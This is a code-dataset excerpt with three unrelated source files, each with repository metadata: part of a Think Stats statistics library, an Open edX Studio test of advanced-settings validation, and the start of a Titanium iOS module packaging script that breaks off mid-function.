    See http://en.wikipedia.org/wiki/Normal_distribution#Quantile_function

    p: float
    mu: mean parameter
    sigma: standard deviation parameter

    Returns: float
    """
    return stats.norm.ppf(p, mu, sigma)
def EvalLognormalCdf(x, mu=0, sigma=1):
    """Evaluates the CDF of the lognormal distribution.

    x: float or sequence
    mu: mean of log(X)
    sigma: standard deviation of log(X)

    Returns: float or sequence
    """
    # scipy's lognorm takes the shape parameter s=sigma and scale=exp(mu).
    # The previous call passed only loc/scale, which raised a TypeError
    # (missing shape argument) and misparameterized the distribution.
    return stats.lognorm.cdf(x, sigma, scale=np.exp(mu))
def RenderExpoCdf(lam, low, high, n=101):
    """Generates sequences of xs and ps for an exponential CDF.

    lam: parameter
    low: float
    high: float
    n: number of points to render

    returns: numpy arrays (xs, ps)
    """
    xs = np.linspace(low, high, n)
    # equivalent to stats.expon.cdf(xs, scale=1.0/lam)
    return xs, 1 - np.exp(-lam * xs)
def RenderNormalCdf(mu, sigma, low, high, n=101):
    """Generates sequences of xs and ps for a Normal CDF.

    mu: parameter
    sigma: parameter
    low: float
    high: float
    n: number of points to render

    returns: numpy arrays (xs, ps)
    """
    xs = np.linspace(low, high, n)
    return xs, stats.norm.cdf(xs, mu, sigma)
def RenderParetoCdf(xmin, alpha, low, high, n=50):
    """Generates sequences of xs and ps for a Pareto CDF.

    xmin: parameter
    alpha: parameter
    low: float
    high: float
    n: number of points to render

    returns: numpy arrays (xs, ps)
    """
    # the CDF is zero below xmin, so clip the range
    low = max(low, xmin)
    xs = np.linspace(low, high, n)
    # equivalent to stats.pareto.cdf(xs, scale=xmin, b=alpha)
    return xs, 1 - (xs / xmin) ** -alpha
class Beta(object):
    """A Beta distribution (conjugate prior for the binomial).

    See http://en.wikipedia.org/wiki/Beta_distribution
    """
    def __init__(self, alpha=1, beta=1, label=None):
        """alpha, beta: shape parameters; label: plot label."""
        self.alpha = alpha
        self.beta = beta
        self.label = '_nolegend_' if label is None else label

    def Update(self, data):
        """Bayesian update with data = (heads, tails)."""
        heads, tails = data
        self.alpha += heads
        self.beta += tails

    def Mean(self):
        """Mean of the distribution: alpha / (alpha + beta)."""
        return self.alpha / (self.alpha + self.beta)

    def Random(self):
        """Draws a single random variate from this distribution."""
        return random.betavariate(self.alpha, self.beta)

    def Sample(self, n):
        """Draws a NumPy array of n random variates.

        n: int sample size
        """
        return np.random.beta(self.alpha, self.beta, (n,))

    def EvalPdf(self, x):
        """Evaluates the (unnormalized) PDF at x."""
        return x ** (self.alpha - 1) * (1 - x) ** (self.beta - 1)

    def MakePmf(self, steps=101, label=None):
        """Discrete approximation of this distribution.

        Normally the PDF is sampled at a grid of points and the densities
        treated as probability masses.  But if alpha or beta is less than
        one the PDF diverges at 0 or 1, so in that case the CDF is
        differenced instead -- slightly asymmetric at the endpoints, but a
        reasonable discrete model that improves as steps increases.
        """
        if self.alpha < 1 or self.beta < 1:
            return self.MakeCdf().MakePmf()

        xs = [i / (steps - 1.0) for i in range(steps)]
        densities = [self.EvalPdf(x) for x in xs]
        return Pmf(dict(zip(xs, densities)), label=label)

    def MakeCdf(self, steps=101):
        """CDF of this distribution, via the regularized incomplete beta."""
        xs = [i / (steps - 1.0) for i in range(steps)]
        return Cdf(xs, special.betainc(self.alpha, self.beta, xs))

    def Percentile(self, ps):
        """Inverse CDF at the given percentile(s).

        ps: scalar, array, or list of [0-100]
        """
        fractions = np.asarray(ps) / 100
        return special.betaincinv(self.alpha, self.beta, fractions)
class Dirichlet(object):
    """Represents a Dirichlet distribution.

    See http://en.wikipedia.org/wiki/Dirichlet_distribution
    """

    def __init__(self, n, conc=1, label=None):
        """Initializes a Dirichlet distribution.

        n: number of dimensions
        conc: concentration parameter (smaller yields more concentration)
        label: string label

        Raises: ValueError if n < 2
        """
        if n < 2:
            raise ValueError('A Dirichlet distribution with '
                             'n<2 makes no sense')

        self.n = n
        # np.float was removed in NumPy 1.20; builtin float is the
        # equivalent 64-bit dtype
        self.params = np.ones(n, dtype=float) * conc
        self.label = label if label is not None else '_nolegend_'

    def Update(self, data):
        """Updates a Dirichlet distribution.

        data: sequence of observations, in order corresponding to params
        """
        m = len(data)
        self.params[:m] += data

    def Random(self):
        """Generates a random variate from this distribution.

        Returns: normalized vector of fractions
        """
        p = np.random.gamma(self.params)
        return p / p.sum()

    def Likelihood(self, data):
        """Computes the likelihood of the data.

        Selects a random vector of probabilities from this distribution.

        Returns: float probability (0 if data has more dimensions than self)
        """
        m = len(data)
        if self.n < m:
            return 0

        x = data
        p = self.Random()
        q = p[:m] ** x
        return q.prod()

    def LogLikelihood(self, data):
        """Computes the log likelihood of the data.

        Selects a random vector of probabilities from this distribution.

        Returns: float log probability (-inf if data has too many dimensions)
        """
        m = len(data)
        if self.n < m:
            return float('-inf')

        x = self.Random()
        y = np.log(x[:m]) * data
        return y.sum()

    def MarginalBeta(self, i):
        """Computes the marginal distribution of the ith element.

        See http://en.wikipedia.org/wiki/Dirichlet_distribution
        #Marginal_distributions

        i: int

        Returns: Beta object
        """
        alpha0 = self.params.sum()
        alpha = self.params[i]
        return Beta(alpha, alpha0 - alpha)

    def PredictivePmf(self, xs, label=None):
        """Makes a predictive distribution.

        xs: values to go into the Pmf

        Returns: Pmf that maps from x to the mean prevalence of x
        """
        alpha0 = self.params.sum()
        ps = self.params / alpha0
        return Pmf(zip(xs, ps), label=label)
def BinomialCoef(n, k):
    """Compute the binomial coefficient "n choose k".

    n: number of trials
    k: number of successes

    Returns: float
    """
    # scipy.misc.comb was removed in SciPy 1.0; scipy.special.comb is
    # the supported equivalent (returns a float by default).
    return special.comb(n, k)
def LogBinomialCoef(n, k):
    """Approximates the log of the binomial coefficient.

    http://math.stackexchange.com/questions/64716/
    approximating-the-logarithm-of-the-binomial-coefficient

    n: number of trials
    k: number of successes

    Returns: float
    """
    return (n * math.log(n)
            - k * math.log(k)
            - (n - k) * math.log(n - k))
def NormalProbability(ys, jitter=0.0):
    """Generates data for a normal probability plot.

    ys: sequence of values
    jitter: float magnitude of jitter added to the ys

    returns: numpy arrays xs, ys (both sorted ascending)
    """
    xs = np.sort(np.random.normal(0, 1, len(ys)))
    ys = Jitter(ys, jitter) if jitter else np.array(ys)
    ys.sort()
    return xs, ys
def Jitter(values, jitter=0.5):
    """Jitters the values by adding Gaussian noise with std `jitter`.

    values: sequence
    jitter: scalar magnitude of jitter

    returns: new numpy array
    """
    noise = np.random.normal(0, jitter, len(values))
    return noise + values
def NormalProbabilityPlot(sample, fit_color='0.8', **options):
    """Makes a normal probability plot with a fitted line.

    sample: sequence of numbers
    fit_color: color string for the fitted line
    options: passed along to Plot
    """
    xs, ys = NormalProbability(sample)
    mean, var = MeanVar(sample)
    fit = FitLine(xs, mean, math.sqrt(var))
    thinkplot.Plot(*fit, color=fit_color, label='model')

    # re-draw fresh normal variates for the data series
    xs, ys = NormalProbability(sample)
    thinkplot.Plot(xs, ys, **options)
def Mean(xs):
    """Computes the arithmetic mean.

    xs: sequence of values

    returns: float mean
    """
    return np.asarray(xs).mean()
def Var(xs, mu=None, ddof=0):
    """Computes variance.

    xs: sequence of values
    mu: optional known mean
    ddof: delta degrees of freedom

    returns: float
    """
    xs = np.asarray(xs)
    mu = xs.mean() if mu is None else mu
    deviations = xs - mu
    return np.dot(deviations, deviations) / (len(xs) - ddof)
def Std(xs, mu=None, ddof=0):
    """Computes standard deviation.

    xs: sequence of values
    mu: optional known mean
    ddof: delta degrees of freedom

    returns: float
    """
    return math.sqrt(Var(xs, mu, ddof))
def MeanVar(xs, ddof=0):
    """Computes mean and variance in one pass over the array.

    Based on http://stackoverflow.com/questions/19391149/
    numpy-mean-and-variance-from-single-function

    xs: sequence of values
    ddof: delta degrees of freedom

    returns: pair of float, mean and var
    """
    xs = np.asarray(xs)
    mu = xs.mean()
    return mu, Var(xs, mu, ddof)
def Trim(t, p=0.01):
    """Trims the largest and smallest elements of t.

    Args:
        t: sequence of numbers
        p: fraction of values to trim off each end

    Returns:
        sorted list of the remaining values
    """
    n = int(p * len(t))
    if n == 0:
        # Bug fix: sorted(t)[0:-0] is an empty slice, so the old code
        # discarded the entire sequence whenever p*len(t) rounded to zero.
        return sorted(t)
    return sorted(t)[n:-n]
def TrimmedMean(t, p=0.01):
    """Computes the trimmed mean of a sequence of numbers.

    Args:
        t: sequence of numbers
        p: fraction of values to trim off each end

    Returns:
        float
    """
    # Drop the tails, then average what is left.
    return Mean(Trim(t, p))
def TrimmedMeanVar(t, p=0.01):
    """Computes the trimmed mean and variance of a sequence of numbers.

    Side effect: sorts the list.

    Args:
        t: sequence of numbers
        p: fraction of values to trim off each end

    Returns:
        pair of floats (mean, variance)
    """
    trimmed = Trim(t, p)
    return MeanVar(trimmed)
def CohenEffectSize(group1, group2):
    """Compute Cohen's d.

    group1: Series or NumPy array
    group2: Series or NumPy array

    returns: float
    """
    n1, n2 = len(group1), len(group2)
    # Pool the group variances weighted by group size.
    pooled_var = (n1 * group1.var() + n2 * group2.var()) / (n1 + n2)
    return (group1.mean() - group2.mean()) / math.sqrt(pooled_var)
def Cov(xs, ys, meanx=None, meany=None):
    """Computes Cov(X, Y).

    Args:
        xs: sequence of values
        ys: sequence of values
        meanx: optional float mean of xs
        meany: optional float mean of ys

    Returns:
        Cov(X, Y)
    """
    ax = np.asarray(xs)
    ay = np.asarray(ys)
    mx = np.mean(ax) if meanx is None else meanx
    my = np.mean(ay) if meany is None else meany

    # Mean of the elementwise product of deviations (population covariance).
    return np.dot(ax - mx, ay - my) / len(ax)
def Corr(xs, ys):
    """Computes Corr(X, Y).

    Args:
        xs: sequence of values
        ys: sequence of values

    Returns:
        Corr(X, Y)
    """
    ax = np.asarray(xs)
    ay = np.asarray(ys)
    meanx, varx = MeanVar(ax)
    meany, vary = MeanVar(ay)
    # Normalize the covariance by the product of standard deviations.
    return Cov(ax, ay, meanx, meany) / math.sqrt(varx * vary)
def SerialCorr(series, lag=1):
    """Computes the serial correlation of a series.

    series: Series
    lag: integer number of intervals to shift

    returns: float correlation
    """
    # Correlate the series against a lagged copy of itself, dropping the
    # first `lag` elements that have no shifted counterpart.
    shifted = series.shift(lag)
    return Corr(series[lag:], shifted[lag:])
def SpearmanCorr(xs, ys):
    """Computes Spearman's rank correlation.

    Args:
        xs: sequence of values
        ys: sequence of values

    Returns:
        float Spearman's correlation
    """
    # Spearman's rho is Pearson correlation applied to the ranks.
    return Corr(pandas.Series(xs).rank(), pandas.Series(ys).rank())
def MapToRanks(t):
    """Returns a list of ranks corresponding to the elements in t.

    Args:
        t: sequence of numbers

    Returns:
        list of integer ranks, starting at 1
    """
    # Sort (index, value) pairs by value, tag each with its 0-based rank,
    # then restore the original order and shift ranks to start at 1.
    by_value = sorted(enumerate(t), key=itemgetter(1))
    by_index = sorted(enumerate(by_value), key=lambda pair: pair[1][0])
    return [rank + 1 for rank, _ in by_index]
def LeastSquares(xs, ys):
    """Computes a linear least squares fit for ys as a function of xs.

    Args:
        xs: sequence of values
        ys: sequence of values

    Returns:
        tuple of (intercept, slope)
    """
    meanx, varx = MeanVar(xs)
    meany = Mean(ys)

    # slope = Cov(X, Y) / Var(X); the intercept makes the line pass
    # through the point of means.
    slope = Cov(xs, ys, meanx, meany) / varx
    intercept = meany - slope * meanx
    return intercept, slope
def FitLine(xs, inter, slope):
    """Fits a line to the given data.

    xs: sequence of x
    inter: float intercept
    slope: float slope

    returns: tuple of numpy arrays (sorted xs, fit ys)
    """
    sorted_xs = np.sort(xs)
    return sorted_xs, inter + slope * sorted_xs
def Residuals(xs, ys, inter, slope):
    """Computes residuals for a linear fit with parameters inter and slope.

    Args:
        xs: independent variable
        ys: dependent variable
        inter: float intercept
        slope: float slope

    Returns:
        array of residuals (observed minus predicted)
    """
    predicted = inter + slope * np.asarray(xs)
    return np.asarray(ys) - predicted
def CoefDetermination(ys, res):
    """Computes the coefficient of determination (R^2) for given residuals.

    Args:
        ys: dependent variable
        res: residuals

    Returns:
        float coefficient of determination
    """
    # R^2 is the fraction of the variance in ys explained by the model.
    return 1 - Var(res) / Var(ys)
def CorrelatedGenerator(rho):
    """Generates standard normal variates with serial correlation.

    rho: target coefficient of correlation

    Returns: iterable
    """
    # The first draw is unconditional standard normal.
    x = random.gauss(0, 1)
    yield x

    # Each subsequent draw is conditioned on the previous value so the
    # marginal distribution stays N(0, 1) with lag-1 correlation rho.
    sigma = math.sqrt(1 - rho**2)
    while True:
        x = random.gauss(x * rho, sigma)
        yield x
def CorrelatedNormalGenerator(mu, sigma, rho):
    """Generates normal variates with serial correlation.

    mu: mean of variate
    sigma: standard deviation of variate
    rho: target coefficient of correlation

    Returns: iterable
    """
    # Rescale the correlated standard-normal stream to N(mu, sigma^2).
    for z in CorrelatedGenerator(rho):
        yield z * sigma + mu
def RawMoment(xs, k):
    """Computes the kth raw moment of xs: the mean of x**k."""
    total = sum(x**k for x in xs)
    return total / len(xs)
def CentralMoment(xs, k):
    """Computes the kth central moment of xs: the mean of (x - mean)**k."""
    mu = RawMoment(xs, 1)
    return sum((x - mu)**k for x in xs) / len(xs)
def StandardizedMoment(xs, k):
    """Computes the kth standardized moment of xs."""
    # Divide the kth central moment by sigma**k.
    sigma = math.sqrt(CentralMoment(xs, 2))
    return CentralMoment(xs, k) / sigma**k
def Skewness(xs):
    """Computes skewness (the third standardized moment)."""
    return StandardizedMoment(xs, 3)
def Median(xs):
    """Computes the median (50th percentile) of a sequence.

    xs: sequence or anything else that can initialize a Cdf

    returns: float
    """
    return Cdf(xs).Value(0.5)
def IQR(xs):
    """Computes the interquartile range of a sequence.

    xs: sequence or anything else that can initialize a Cdf

    returns: pair of floats (25th and 75th percentiles)
    """
    distribution = Cdf(xs)
    return distribution.Value(0.25), distribution.Value(0.75)
def PearsonMedianSkewness(xs):
    """Computes the Pearson median skewness: 3 * (mean - median) / std."""
    mean = RawMoment(xs, 1)
    std = math.sqrt(CentralMoment(xs, 2))
    return 3 * (mean - Median(xs)) / std
class FixedWidthVariables(object):
    """Represents a set of variables in a fixed width file."""

    def __init__(self, variables, index_base=0):
        """Initializes.

        variables: DataFrame with 'start', 'end' and 'name' columns
        index_base: are the indices 0 or 1 based?

        Attributes:
        colspecs: list of (start, end) index tuples
        names: list of string variable names
        """
        self.variables = variables

        # note: by default, subtract 1 from colspecs
        self.colspecs = variables[['start', 'end']] - index_base

        # convert colspecs to a list of pair of int
        # (bug fix: use the builtin int — the np.int alias was removed
        # in NumPy 1.24 and raises AttributeError there)
        self.colspecs = self.colspecs.astype(int).values.tolist()
        self.names = variables['name']

    def ReadFixedWidth(self, filename, **options):
        """Reads a fixed width ASCII file.

        filename: string filename
        options: passed along to pandas.read_fwf

        returns: DataFrame
        """
        df = pandas.read_fwf(filename,
                             colspecs=self.colspecs,
                             names=self.names,
                             **options)
        return df
def ReadStataDct(dct_file, **options):
    """Reads a Stata dictionary file.

    dct_file: string filename
    options: dict of options passed to open()

    returns: FixedWidthVariables object
    """
    type_map = dict(byte=int, int=int, long=int, float=float, double=float)

    var_info = []
    for line in open(dct_file, **options):
        # Variable declarations look like: _column(1) str12 name %12s "desc"
        match = re.search(r'_column\(([^)]*)\)', line)
        if not match:
            continue
        start = int(match.group(1))
        tokens = line.split()
        vtype, name, fstring = tokens[1:4]
        name = name.lower()
        vtype = str if vtype.startswith('str') else type_map[vtype]
        long_desc = ' '.join(tokens[4:]).strip('"')
        var_info.append((start, vtype, name, fstring, long_desc))

    columns = ['start', 'type', 'name', 'fstring', 'desc']
    variables = pandas.DataFrame(var_info, columns=columns)

    # fill in the end column by shifting the start column;
    # the last variable has no successor, so its end is set to 0
    variables['end'] = variables.start.shift(-1)
    variables.loc[len(variables) - 1, 'end'] = 0

    return FixedWidthVariables(variables, index_base=1)
def Resample(xs, n=None):
    """Draw a sample from xs with the same length as xs.

    xs: sequence
    n: sample size (default: len(xs))

    returns: NumPy array
    """
    size = len(xs) if n is None else n
    # Bootstrap sampling: draw with replacement.
    return np.random.choice(xs, size, replace=True)
def SampleRows(df, nrows, replace=False):
    """Choose a sample of rows from a DataFrame.

    df: DataFrame
    nrows: number of rows
    replace: whether to sample with replacement

    returns: DataFrame
    """
    chosen = np.random.choice(df.index, nrows, replace=replace)
    return df.loc[chosen]
def ResampleRows(df):
    """Resamples rows from a DataFrame.

    df: DataFrame

    returns: DataFrame of the same length, sampled with replacement
    """
    return SampleRows(df, len(df), replace=True)
def ResampleRowsWeighted(df, column='finalwgt'):
    """Resamples a DataFrame using probabilities proportional to given column.

    df: DataFrame
    column: string column name to use as weights

    returns: DataFrame
    """
    # Normalize the weights into probabilities.
    weights = df[column].copy()
    weights /= sum(weights)

    chosen = np.random.choice(df.index, len(df), replace=True, p=weights)
    return df.loc[chosen]
def PercentileRow(array, p):
    """Selects the row from a sorted array that maps to percentile p.

    array: NumPy 2-D array whose rows are sorted along axis 0
    p: float 0--100

    returns: NumPy array (one row)
    """
    rows, cols = array.shape
    # Bug fix: clamp the index so that p == 100 selects the last row
    # instead of indexing one past the end (which raised IndexError).
    index = min(int(rows * p / 100), rows - 1)
    return array[index,]
def PercentileRows(ys_seq, percents):
    """Given a collection of lines, selects percentiles along vertical axis.

    For example, if ys_seq contains simulation results like ys as a
    function of time, and percents contains (5, 95), the result would
    be a 90% CI for each vertical slice of the simulation results.

    ys_seq: sequence of lines (y values)
    percents: list of percentiles (0-100) to select

    returns: list of NumPy arrays, one for each percentile
    """
    # Stack the lines into a float matrix, one row per line, then sort
    # each column independently.
    matrix = np.zeros((len(ys_seq), len(ys_seq[0])))
    for row, ys in enumerate(ys_seq):
        matrix[row,] = ys
    matrix = np.sort(matrix, axis=0)

    return [PercentileRow(matrix, p) for p in percents]
def Smooth(xs, sigma=2, **options):
    """Smooths a NumPy array with a Gaussian filter.

    xs: sequence
    sigma: standard deviation of the filter
    options: passed along to gaussian_filter1d

    returns: NumPy array
    """
    # Bug fix: the scipy.ndimage.filters namespace was deprecated and has
    # been removed in recent SciPy; the function lives in scipy.ndimage.
    return ndimage.gaussian_filter1d(xs, sigma, **options)
class HypothesisTest(object):
    """Represents a hypothesis test."""

    def __init__(self, data):
        """Initializes.

        data: data in whatever form is relevant
        """
        self.data = data
        self.MakeModel()
        self.actual = self.TestStatistic(data)
        # Filled in lazily by PValue.
        self.test_stats = None
        self.test_cdf = None

    def PValue(self, iters=1000):
        """Computes the distribution of the test statistic and p-value.

        iters: number of iterations

        returns: float p-value
        """
        # Simulate the null hypothesis and collect the test statistics.
        self.test_stats = []
        for _ in range(iters):
            self.test_stats.append(self.TestStatistic(self.RunModel()))
        self.test_cdf = Cdf(self.test_stats)

        # Fraction of simulated statistics at least as extreme as observed.
        count = sum(1 for stat in self.test_stats if stat >= self.actual)
        return count / iters

    def MaxTestStat(self):
        """Returns the largest test statistic seen during simulations."""
        return max(self.test_stats)

    def PlotCdf(self, label=None):
        """Draws a Cdf with a vertical line at the observed test stat."""
        def VertLine(x):
            """Draws a vertical line at x."""
            thinkplot.Plot([x, x], [0, 1], color='0.8')

        VertLine(self.actual)
        thinkplot.Cdf(self.test_cdf, label=label)

    def TestStatistic(self, data):
        """Computes the test statistic.

        data: data in whatever form is relevant
        """
        raise UnimplementedMethodException()

    def MakeModel(self):
        """Build a model of the null hypothesis."""
        pass

    def RunModel(self):
        """Run the model of the null hypothesis.

        returns: simulated data
        """
        raise UnimplementedMethodException()
def main():
    """Entry point when the module is run as a script; does nothing."""
    pass


if __name__ == '__main__':
    main()
|
smorton2/think-stats
|
code/thinkstats2.py
|
Python
|
gpl-3.0
| 70,025
|
[
"Gaussian"
] |
524f2df7adee26d00012dd6bc687d7aefc51131f081d9bae675a326f0b28f417
|
"""
Acceptance tests for Studio's Setting pages
"""
from nose.plugins.attrib import attr
from base_studio_test import StudioCourseTest
from ...pages.studio.settings_advanced import AdvancedSettingsPage
@attr('shard_1')
class AdvancedSettingsValidationTest(StudioCourseTest):
    """
    Tests for validation feature in Studio's advanced settings tab

    NOTE(review): this test class uses Python 2 idioms (dict.iteritems
    and print statements) and will not run under Python 3 as written.
    """
    def setUp(self):
        super(AdvancedSettingsValidationTest, self).setUp()
        self.advanced_settings = AdvancedSettingsPage(
            self.browser,
            self.course_info['org'],
            self.course_info['number'],
            self.course_info['run']
        )
        # One representative field of each settings type; see
        # get_settings_fields_of_each_type for the type mapping.
        self.type_fields = ['Course Display Name', 'Advanced Module List', 'Discussion Topic Mapping',
                            'Maximum Attempts', 'Course Announcement Date']
        # Before every test, make sure to visit the page first
        self.advanced_settings.visit()
        self.assertTrue(self.advanced_settings.is_browser_on_page())
    def test_modal_shows_one_validation_error(self):
        """
        Test that advanced settings don't save if there's a single wrong input,
        and that it shows the correct error message in the modal.
        """
        # Feed an integer value for String field.
        # .set method saves automatically after setting a value
        course_display_name = self.advanced_settings.get('Course Display Name')
        self.advanced_settings.set('Course Display Name', 1)
        self.advanced_settings.wait_for_modal_load()
        # Test Modal
        self.check_modal_shows_correct_contents(['Course Display Name'])
        # Reload the page to verify the invalid value was not persisted.
        self.advanced_settings.refresh_and_wait_for_load()
        self.assertEquals(
            self.advanced_settings.get('Course Display Name'),
            course_display_name,
            'Wrong input for Course Display Name must not change its value'
        )
    def test_modal_shows_multiple_validation_errors(self):
        """
        Test that advanced settings don't save with multiple wrong inputs
        """
        # Save original values and feed wrong inputs
        original_values_map = self.get_settings_fields_of_each_type()
        self.set_wrong_inputs_to_fields()
        self.advanced_settings.wait_for_modal_load()
        # Test Modal
        self.check_modal_shows_correct_contents(self.type_fields)
        # Reload the page to verify none of the invalid values persisted.
        self.advanced_settings.refresh_and_wait_for_load()
        for key, val in original_values_map.iteritems():
            self.assertEquals(
                self.advanced_settings.get(key),
                val,
                'Wrong input for Advanced Settings Fields must not change its value'
            )
    def test_undo_changes(self):
        """
        Test that undo changes button in the modal resets all settings changes
        """
        # Save original values and feed wrong inputs
        original_values_map = self.get_settings_fields_of_each_type()
        self.set_wrong_inputs_to_fields()
        # Let modal popup
        self.advanced_settings.wait_for_modal_load()
        # Press Undo Changes button
        self.advanced_settings.undo_changes_via_modal()
        # Check that changes are undone
        for key, val in original_values_map.iteritems():
            self.assertEquals(
                self.advanced_settings.get(key),
                val,
                'Undoing Should revert back to original value'
            )
    def test_manual_change(self):
        """
        Test that manual changes button in the modal keeps settings unchanged
        """
        # Must mirror the values used in set_wrong_inputs_to_fields.
        inputs = {"Course Display Name": 1,
                  "Advanced Module List": 1,
                  "Discussion Topic Mapping": 1,
                  "Maximum Attempts": '"string"',
                  "Course Announcement Date": '"string"',
                  }
        self.set_wrong_inputs_to_fields()
        self.advanced_settings.wait_for_modal_load()
        self.advanced_settings.trigger_manual_changes()
        # Check that the validation modal went away.
        self.assertFalse(self.advanced_settings.is_validation_modal_present())
        # Iterate through the wrong values and make sure they're still displayed
        for key, val in inputs.iteritems():
            print self.advanced_settings.get(key)
            print val
            self.assertEquals(
                str(self.advanced_settings.get(key)),
                str(val),
                'manual change should keep: ' + str(val) + ', but is: ' + str(self.advanced_settings.get(key))
            )
    def check_modal_shows_correct_contents(self, wrong_settings_list):
        """
        Helper function that checks if the validation modal contains correct
        error messages.

        wrong_settings_list: list of display names expected in the modal
        """
        # Check presence of modal
        self.assertTrue(self.advanced_settings.is_validation_modal_present())
        # List of wrong settings item & what is presented in the modal should be the same
        error_item_names = self.advanced_settings.get_error_item_names()
        self.assertEqual(set(wrong_settings_list), set(error_item_names))
        # Every error item should carry a message.
        error_item_messages = self.advanced_settings.get_error_item_messages()
        self.assertEqual(len(error_item_names), len(error_item_messages))
    def get_settings_fields_of_each_type(self):
        """
        Get one of each field type:
           - String: Course Display Name
           - List: Advanced Module List
           - Dict: Discussion Topic Mapping
           - Integer: Maximum Attempts
           - Date: Course Announcement Date

        Returns a dict mapping display name to its current value.
        """
        return {
            "Course Display Name": self.advanced_settings.get('Course Display Name'),
            "Advanced Module List": self.advanced_settings.get('Advanced Module List'),
            "Discussion Topic Mapping": self.advanced_settings.get('Discussion Topic Mapping'),
            "Maximum Attempts": self.advanced_settings.get('Maximum Attempts'),
            "Course Announcement Date": self.advanced_settings.get('Course Announcement Date'),
        }
    def set_wrong_inputs_to_fields(self):
        """
        Set wrong values for the chosen fields
        (a number where a string is expected, and vice versa).
        """
        self.advanced_settings.set_values(
            {
                "Course Display Name": 1,
                "Advanced Module List": 1,
                "Discussion Topic Mapping": 1,
                "Maximum Attempts": '"string"',
                "Course Announcement Date": '"string"',
            }
        )
|
c0710204/edx-platform
|
common/test/acceptance/tests/studio/test_studio_settings.py
|
Python
|
agpl-3.0
| 6,475
|
[
"VisIt"
] |
531be978020219f6a0ba691915da9df4cb51a7ff24ef6e0f33a63f58fa50a002
|
#!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string
import zipfile
from datetime import date
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
required_module_keys = ['name','version','moduleid','description','copyright','license','copyright','platform','minsdk']
module_defaults = {
'description':'My module',
'author': 'Your Name',
'license' : 'Specify your license',
'copyright' : 'Copyright (c) %s by Your Company' % str(date.today().year),
}
module_license_default = "TODO: place your license here and we'll include it in the module distribution"
def find_sdk(config):
	"""Return the Titanium SDK path from config, expanding ~ and env vars."""
	sdk_path = config['TITANIUM_SDK']
	return os.path.expandvars(os.path.expanduser(sdk_path))
def replace_vars(config, token):
	"""Expand $(KEY) references in token using values from config.

	Unknown keys and unterminated references are left untouched and
	stop further expansion, matching the original behaviour.
	"""
	idx = token.find('$(')
	while idx != -1:
		idx2 = token.find(')', idx + 2)
		if idx2 == -1:
			break
		key = token[idx + 2:idx2]
		# dict.has_key() was removed in Python 3; `in` works in 2 and 3.
		if key not in config:
			break
		token = token.replace('$(%s)' % key, config[key])
		idx = token.find('$(')
	return token
def read_ti_xcconfig():
	"""Parse titanium.xcconfig into a dict, expanding $(VAR) references."""
	contents = open(os.path.join(cwd,'titanium.xcconfig')).read()
	config = {}
	for line in contents.splitlines(False):
		line = line.strip()
		# skip '//' comment lines
		if line[0:2]=='//': continue
		idx = line.find('=')
		if idx > 0:
			key = line[0:idx].strip()
			value = line[idx+1:].strip()
			# expand $(KEY) references using the entries parsed so far
			config[key] = replace_vars(config,value)
	return config
def generate_doc(config):
	"""Render each file under documentation/ from Markdown to HTML.

	Returns a list of {filename: html} dicts, or None when the
	documentation directory is missing.
	"""
	docdir = os.path.join(cwd,'documentation')
	if not os.path.exists(docdir):
		print "Couldn't find documentation file at: %s" % docdir
		return None
	try:
		# prefer markdown2 when installed, fall back to markdown
		import markdown2 as markdown
	except ImportError:
		import markdown
	documentation = []
	for file in os.listdir(docdir):
		# NOTE(review): ignoreFiles is defined later at module level; it is
		# bound by the time this function is called from __main__.
		if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
			continue
		md = open(os.path.join(docdir,file)).read()
		html = markdown.markdown(md)
		documentation.append({file:html});
	return documentation
def compile_js(manifest,config):
	"""Compile the module's CommonJS assets, splice the generated
	Objective-C lookup code into the asset router, and write the
	exported symbol list to metadata.json.
	"""
	js_file = os.path.join(cwd,'assets','jptech.ios7media.js')
	# nothing to do when the module ships no JS asset
	if not os.path.exists(js_file): return
	from compiler import Compiler
	try:
		import json
	except:
		import simplejson as json
	compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
	root_asset, module_assets = compiler.compile_module()
	# Objective-C snippet spliced into the router's 'asset' section.
	root_asset_content = """
%s
	return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
	# Objective-C snippet spliced into the 'resolve_asset' section.
	module_asset_content = """
%s
	NSNumber *index = [map objectForKey:path];
	if (index == nil) {
		return nil;
	}
	return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
	from tools import splice_code
	assets_router = os.path.join(cwd,'Classes','JptechIos7mediaModuleAssets.m')
	splice_code(assets_router, 'asset', root_asset_content)
	splice_code(assets_router, 'resolve_asset', module_asset_content)
	# Generate the exports after crawling all of the available JS source
	exports = open('metadata.json','w')
	json.dump({'exports':compiler.exports }, exports)
	exports.close()
def die(msg):
	"""Print msg and terminate with a non-zero exit status."""
	print msg
	sys.exit(1)
def warn(msg):
	"""Print a non-fatal warning message."""
	print "[WARN] %s" % msg
def validate_license():
	"""Warn when the LICENSE file still contains the placeholder text."""
	c = open(os.path.join(cwd,'LICENSE')).read()
	if c.find(module_license_default)!=-1:
		warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
	"""Parse and sanity-check the module manifest.

	Returns (manifest dict, path to manifest file); exits via die() when
	the file is missing or a required key is absent.
	"""
	path = os.path.join(cwd, 'manifest')
	# Bug fix: check existence BEFORE opening — the old code opened first,
	# so a missing manifest raised IOError instead of the intended die().
	if not os.path.exists(path):
		die("missing %s" % path)
	f = open(path)
	manifest = {}
	for line in f.readlines():
		line = line.strip()
		if line[0:1] == '#':
			continue
		if line.find(':') < 0:
			continue
		# split on the first ':' only, so values containing ':' survive
		key, value = line.split(':', 1)
		manifest[key.strip()] = value.strip()
	for key in required_module_keys:
		# dict.has_key() was removed in Python 3; `in` works in 2 and 3.
		if key not in manifest:
			die("missing required manifest key '%s'" % key)
		if key in module_defaults:
			defvalue = module_defaults[key]
			curvalue = manifest[key]
			if curvalue == defvalue:
				warn("please update the manifest key: '%s' to a non-default value" % key)
	return manifest, path
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
def zip_dir(zf,dir,basepath,ignoreExt=[]):
	"""Recursively add dir to zipfile zf, re-rooted under basepath.

